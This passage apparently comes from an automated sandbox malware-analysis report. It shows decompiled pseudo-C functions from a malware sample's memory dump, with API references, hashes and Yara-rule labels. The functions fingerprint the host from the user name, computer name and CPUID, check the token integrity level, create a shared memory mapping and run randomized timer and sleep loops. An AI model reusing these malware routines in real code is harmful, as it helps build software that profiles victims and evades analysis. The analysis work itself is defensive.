					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x497d284 = 5;
						} else {
							_t68 = E0497502E(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x497d298 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E0497577D(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16);
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E04972107(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x497d27c);
							goto L21;
						} else {
							__eflags =  *0x497d280; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E049747D5();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x497d280);
								L21:
								L0497AED0();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x497d270, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}




























                                                                                                                          0x04975461
                                                                                                                          0x04975473
                                                                                                                          0x04975476
                                                                                                                          0x04975482
                                                                                                                          0x04975488
                                                                                                                          0x0497548d
                                                                                                                          0x049755f4
                                                                                                                          0x04975493
                                                                                                                          0x04975493
                                                                                                                          0x04975495
                                                                                                                          0x0497549a
                                                                                                                          0x0497549b
                                                                                                                          0x049754a1
                                                                                                                          0x049754a4
                                                                                                                          0x049754a7
                                                                                                                          0x049754b5
                                                                                                                          0x049754c0
                                                                                                                          0x049754c3
                                                                                                                          0x049754c5
                                                                                                                          0x049754d2
                                                                                                                          0x049754dc
                                                                                                                          0x049754de
                                                                                                                          0x049754e3
                                                                                                                          0x049754e8
                                                                                                                          0x049754f3
                                                                                                                          0x049754f3
                                                                                                                          0x049754ea
                                                                                                                          0x049754ea
                                                                                                                          0x049754f1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x049754f1
                                                                                                                          0x049754fd
                                                                                                                          0x00000000
                                                                                                                          0x04975500
                                                                                                                          0x04975504
                                                                                                                          0x0497550f
                                                                                                                          0x0497550f
                                                                                                                          0x04975516
                                                                                                                          0x0497551f
                                                                                                                          0x04975526
                                                                                                                          0x0497552f
                                                                                                                          0x04975532
                                                                                                                          0x04975535
                                                                                                                          0x0497553a
                                                                                                                          0x0497553f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04975541
                                                                                                                          0x04975544
                                                                                                                          0x04975547
                                                                                                                          0x0497554a
                                                                                                                          0x00000000
                                                                                                                          0x0497554c
                                                                                                                          0x0497555b
                                                                                                                          0x0497555b
                                                                                                                          0x00000000
                                                                                                                          0x04975589
                                                                                                                          0x04975589
                                                                                                                          0x0497558e
                                                                                                                          0x049755ad
                                                                                                                          0x049755af
                                                                                                                          0x049755b4
                                                                                                                          0x049755b5
                                                                                                                          0x00000000
                                                                                                                          0x04975590
                                                                                                                          0x04975590
                                                                                                                          0x04975596
                                                                                                                          0x00000000
                                                                                                                          0x04975598
                                                                                                                          0x04975598
                                                                                                                          0x0497559d
                                                                                                                          0x0497559f
                                                                                                                          0x049755a4
                                                                                                                          0x049755a5
                                                                                                                          0x049755bb
                                                                                                                          0x049755bb
                                                                                                                          0x049755c3
                                                                                                                          0x049755ce
                                                                                                                          0x049755d1
                                                                                                                          0x049755dc
                                                                                                                          0x049755de
                                                                                                                          0x049755e1
                                                                                                                          0x049755e3
                                                                                                                          0x00000000
                                                                                                                          0x049755e9
                                                                                                                          0x00000000
                                                                                                                          0x049755e9
                                                                                                                          0x049755e3
                                                                                                                          0x04975596
                                                                                                                          0x00000000
                                                                                                                          0x0497558e
                                                                                                                          0x0497555e
                                                                                                                          0x04975560
                                                                                                                          0x04975563
                                                                                                                          0x04975564
                                                                                                                          0x04975564
                                                                                                                          0x04975568
                                                                                                                          0x04975572
                                                                                                                          0x04975572
                                                                                                                          0x04975578
                                                                                                                          0x0497557b
                                                                                                                          0x0497557b
                                                                                                                          0x04975581
                                                                                                                          0x04975581
                                                                                                                          0x049755fe
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • memset.NTDLL ref: 04975476
                                                                                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04975482
                                                                                                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 049754A7
                                                                                                                          • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 049754C3
                                                                                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 049754DC
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04975572
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 04975581
                                                                                                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 049755BB
                                                                                                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,049753C9,?), ref: 049755D1
                                                                                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 049755DC
                                                                                                                            • Part of subcall function 0497502E: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,06FF93A8,?,00000000,30314549,00000014,004F0053,06FF9364), ref: 0497511A
                                                                                                                            • Part of subcall function 0497502E: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,049754EF), ref: 0497512C
                                                                                                                          • GetLastError.KERNEL32 ref: 049755EE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3521023985-0
                                                                                                                          • Opcode ID: 564e4da861b016461d9d28070fdadf4ff00d9b3e884258fad56454875264898a
                                                                                                                          • Instruction ID: dbc961d4c0b04b3420d8227443756091755d9a5d993fb4ba3e8c5fc0fecf33a0
                                                                                                                          • Opcode Fuzzy Hash: 564e4da861b016461d9d28070fdadf4ff00d9b3e884258fad56454875264898a
                                                                                                                          • Instruction Fuzzy Hash: 2C5148B1805228BBEF509FA4DC44DEEBFB9EF49730F204626F515A2190D634AA40DBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04973598, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 74%
                                                                                                                          			E04973598(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L0497AECA();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x497d2e0; // 0x267a5a8
				_t5 = _t13 + 0x497e876; // 0x6ff8e1e
				_t6 = _t13 + 0x497e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L0497ABEA();
				_t17 = CreateFileMappingW(0xffffffff, 0x497d2e4, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                                                                                                          0x04973598
                                                                                                                          0x049735a0
                                                                                                                          0x049735a4
                                                                                                                          0x049735aa
                                                                                                                          0x049735af
                                                                                                                          0x049735b4
                                                                                                                          0x049735b7
                                                                                                                          0x049735ba
                                                                                                                          0x049735bf
                                                                                                                          0x049735c0
                                                                                                                          0x049735c3
                                                                                                                          0x049735c8
                                                                                                                          0x049735cf
                                                                                                                          0x049735d9
                                                                                                                          0x049735db
                                                                                                                          0x049735dc
                                                                                                                          0x049735df
                                                                                                                          0x049735fb
                                                                                                                          0x04973601
                                                                                                                          0x04973605
                                                                                                                          0x04973653
                                                                                                                          0x04973607
                                                                                                                          0x04973614
                                                                                                                          0x04973624
                                                                                                                          0x0497362c
                                                                                                                          0x0497363e
                                                                                                                          0x04973642
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0497362e
                                                                                                                          0x04973631
                                                                                                                          0x04973636
                                                                                                                          0x04973638
                                                                                                                          0x04973638
                                                                                                                          0x04973616
                                                                                                                          0x04973618
                                                                                                                          0x04973644
                                                                                                                          0x04973645
                                                                                                                          0x04973645
                                                                                                                          0x04973614
                                                                                                                          0x0497365a

                                                                                                                          APIs
                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,0497529C,?,?,4D283A53,?,?), ref: 049735A4
                                                                                                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 049735BA
                                                                                                                          • _snwprintf.NTDLL ref: 049735DF
                                                                                                                          • CreateFileMappingW.KERNELBASE(000000FF,0497D2E4,00000004,00000000,00001000,?), ref: 049735FB
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0497529C,?,?,4D283A53), ref: 0497360D
                                                                                                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 04973624
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,0497529C,?,?), ref: 04973645
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0497529C,?,?,4D283A53), ref: 0497364D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1814172918-0
                                                                                                                          • Opcode ID: 49e94afc19254c174de60ef0774ba9257bd908679cd0f6c6200b3b56f9c61d1c
                                                                                                                          • Instruction ID: 4c8a90c11291546af85291120047e02ed0dd75c3b1cb7508eea45a2e8b0cb34e
                                                                                                                          • Opcode Fuzzy Hash: 49e94afc19254c174de60ef0774ba9257bd908679cd0f6c6200b3b56f9c61d1c
                                                                                                                          • Instruction Fuzzy Hash: 0521D272600204BBDB219B64DC4AF8D3BADEB84B04F100131FA06E7280E674E905DB94
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0497A82B, Relevance: 12.1, APIs: 8, Instructions: 103memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E0497A82B(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x497d2a8; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E049760B6( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x497d2dc ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x497d270, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E0497789B(_v8 + _v8, _t64);
							}
							HeapFree( *0x497d270, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x497d270, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E0497789B(_v8 + _v8, _t64);
						}
						HeapFree( *0x497d270, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















                                                                                                                          0x0497a82b
                                                                                                                          0x0497a833
                                                                                                                          0x0497a837
                                                                                                                          0x0497a83a
                                                                                                                          0x0497a83f
                                                                                                                          0x0497a841
                                                                                                                          0x0497a846
                                                                                                                          0x0497a846
                                                                                                                          0x0497a84c
                                                                                                                          0x0497a84e
                                                                                                                          0x0497a85b
                                                                                                                          0x0497a8bc
                                                                                                                          0x0497a85d
                                                                                                                          0x0497a862
                                                                                                                          0x0497a868
                                                                                                                          0x0497a86d
                                                                                                                          0x0497a87b
                                                                                                                          0x0497a87f
                                                                                                                          0x0497a88e
                                                                                                                          0x0497a895
                                                                                                                          0x0497a89c
                                                                                                                          0x0497a89c
                                                                                                                          0x0497a8a7
                                                                                                                          0x0497a8a7
                                                                                                                          0x0497a87f
                                                                                                                          0x0497a86d
                                                                                                                          0x0497a8be
                                                                                                                          0x0497a8c4
                                                                                                                          0x0497a8ce
                                                                                                                          0x0497a8d0
                                                                                                                          0x0497a8d5
                                                                                                                          0x0497a8e4
                                                                                                                          0x0497a8e8
                                                                                                                          0x0497a8f3
                                                                                                                          0x0497a8fa
                                                                                                                          0x0497a901
                                                                                                                          0x0497a901
                                                                                                                          0x0497a90d
                                                                                                                          0x0497a90d
                                                                                                                          0x0497a8e8
                                                                                                                          0x0497a918
                                                                                                                          0x0497a91a
                                                                                                                          0x0497a91d
                                                                                                                          0x0497a91f
                                                                                                                          0x0497a922
                                                                                                                          0x0497a925
                                                                                                                          0x0497a92f
                                                                                                                          0x0497a933
                                                                                                                          0x0497a937

                                                                                                                          APIs
                                                                                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 0497A862
                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0497A879
                                                                                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 0497A886
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,0497538B), ref: 0497A8A7
                                                                                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 0497A8CE
                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0497A8E2
                                                                                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 0497A8EF
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,0497538B), ref: 0497A90D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: HeapName$AllocateComputerFreeUser
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3239747167-0
                                                                                                                          • Opcode ID: a3af8de231efa94e222f643ce543888ba335b557fa359e378e9b41b7ffde9e5c
                                                                                                                          • Instruction ID: 5d2bccfd24f677493393ac7e4c1db0b400f11b0d007fff1f3d7f5b2ba95b9172
                                                                                                                          • Opcode Fuzzy Hash: a3af8de231efa94e222f643ce543888ba335b557fa359e378e9b41b7ffde9e5c
                                                                                                                          • Instruction Fuzzy Hash: AB31DC71A04205EFEB10DFA5DD81AAEBBF9FF44310B11457AE505E3211E734EE069B50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04974151, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E04974151(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x497d294 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E049775F6(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E04974AAB(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                                                                                                          0x0497415e
                                                                                                                          0x04974165
                                                                                                                          0x0497416c
                                                                                                                          0x04974180
                                                                                                                          0x0497418b
                                                                                                                          0x049741a3
                                                                                                                          0x049741b0
                                                                                                                          0x049741b3
                                                                                                                          0x049741b8
                                                                                                                          0x049741c3
                                                                                                                          0x049741c7
                                                                                                                          0x049741d6
                                                                                                                          0x049741da
                                                                                                                          0x049741f6
                                                                                                                          0x049741f6
                                                                                                                          0x049741fa
                                                                                                                          0x049741fa
                                                                                                                          0x049741ff
                                                                                                                          0x04974203
                                                                                                                          0x04974209
                                                                                                                          0x0497420a
                                                                                                                          0x04974211
                                                                                                                          0x04974217

                                                                                                                          APIs
                                                                                                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04974183
                                                                                                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 049741A3
                                                                                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 049741B3
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 04974203
                                                                                                                            • Part of subcall function 049775F6: RtlAllocateHeap.NTDLL(00000000,00000000,04974F70), ref: 04977602
                                                                                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 049741D6
                                                                                                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 049741DE
                                                                                                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 049741EE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1295030180-0
                                                                                                                          • Opcode ID: a060705669deef410556d25ab2bad5986499d1bb2ee3965fe078c38061ddcc6c
                                                                                                                          • Instruction ID: 079de00e2ccc7a7906ec4bcc4268c5a2a19ead8ba8d76a2fd9e8c2f558b70d79
                                                                                                                          • Opcode Fuzzy Hash: a060705669deef410556d25ab2bad5986499d1bb2ee3965fe078c38061ddcc6c
                                                                                                                          • Instruction Fuzzy Hash: 9B215975900219FFEB00AF94DC84EAEBFB9EF48304F0000B6EA10A6261C775AE15DB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0497262F, Relevance: 9.1, APIs: 6, Instructions: 61sleepmemorytimeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 74%
                                                                                                                          			E0497262F(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t27;
				signed int _t34;

				_t27 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x497d270 = _t10;
				if(_t10 != 0) {
					 *0x497d160 = GetTickCount();
					_t12 = E04971A24(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
							_push(0);
							_push(0x13);
							_push(_t23 >> 5);
							_push(_t16);
							L0497B02E();
							_t34 = _t14 + _t16;
							_t18 = E04974F23(_a4, _t34);
							_t19 = 3;
							_t26 = _t34 & 0x00000007;
							Sleep(_t19 << (_t34 & 0x00000007)); // executed
						} while (_t18 == 1);
						if(E049727C7(_t26) != 0) {
							 *0x497d298 = 1; // executed
						}
						_t12 = E0497520D(_t27); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}













                                                                                                                          0x0497262f
                                                                                                                          0x04972635
                                                                                                                          0x04972636
                                                                                                                          0x04972642
                                                                                                                          0x04972648
                                                                                                                          0x0497264f
                                                                                                                          0x0497265f
                                                                                                                          0x04972664
                                                                                                                          0x0497266b
                                                                                                                          0x0497266d
                                                                                                                          0x04972672
                                                                                                                          0x04972678
                                                                                                                          0x0497267e
                                                                                                                          0x04972688
                                                                                                                          0x0497268c
                                                                                                                          0x0497268e
                                                                                                                          0x04972693
                                                                                                                          0x04972694
                                                                                                                          0x04972695
                                                                                                                          0x0497269a
                                                                                                                          0x049726a0
                                                                                                                          0x049726ab
                                                                                                                          0x049726ac
                                                                                                                          0x049726b2
                                                                                                                          0x049726b8
                                                                                                                          0x049726c4
                                                                                                                          0x049726c6
                                                                                                                          0x049726c6
                                                                                                                          0x049726d0
                                                                                                                          0x049726d0
                                                                                                                          0x04972651
                                                                                                                          0x04972653
                                                                                                                          0x04972653
                                                                                                                          0x049726da

                                                                                                                          APIs
                                                                                                                          • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04971900,?), ref: 04972642
                                                                                                                          • GetTickCount.KERNEL32 ref: 04972656
                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,04971900,?), ref: 04972672
                                                                                                                          • SwitchToThread.KERNEL32(?,00000001,?,?,?,04971900,?), ref: 04972678
                                                                                                                          • _aullrem.NTDLL(?,?,00000013,00000000), ref: 04972695
                                                                                                                          • Sleep.KERNELBASE(00000003,00000000,?,00000001,?,?,?,04971900,?), ref: 049726B2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 507476733-0
                                                                                                                          • Opcode ID: bd861dcbf6c820aa1a7597321911e384b9d87de7de33533b7b59ef1f007095d3
                                                                                                                          • Instruction ID: 45950fe960511109a5652d2e13d7443340dfeade41860a77aedfef7c83844413
                                                                                                                          • Opcode Fuzzy Hash: bd861dcbf6c820aa1a7597321911e384b9d87de7de33533b7b59ef1f007095d3
                                                                                                                          • Instruction Fuzzy Hash: 7C11A972B543046BEB106B74DC4DF5A7B9CFB84355F00023AFA15D6280EAB4F84087A1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0497520D, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 57%
                                                                                                                          			E0497520D(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E0497154A();
				if(_t21 != 0) {
					_t59 =  *0x497d294; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x497d294 = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x497d12c(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E049721DE( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x497d2e0; // 0x267a5a8
					if( *0x497d294 > 5) {
						_t8 = _t26 + 0x497e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x497e9f9; // 0x44283a44
						_t27 = _t7;
					}
					E049711F4(_t27, _t27);
					_t31 = E04973598(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x497d2a8 =  *0x497d2a8 ^ 0x81bbe65d;
						_t32 = E049775F6(0x60);
						 *0x497d364 = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x497d364; // 0x6ff95b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x497d364; // 0x6ff95b0
							 *_t51 = 0x497e823;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x497d270, 0, 0x43);
							 *0x497d300 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x497d294; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x497d2e0; // 0x267a5a8
								_t13 = _t58 + 0x497e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x497c2a7);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E0497A82B( ~_v8 &  *0x497d2a8, 0x497d00c); // executed
								_t42 = E04974C40(_t55); // executed
								_t54 = _t42;
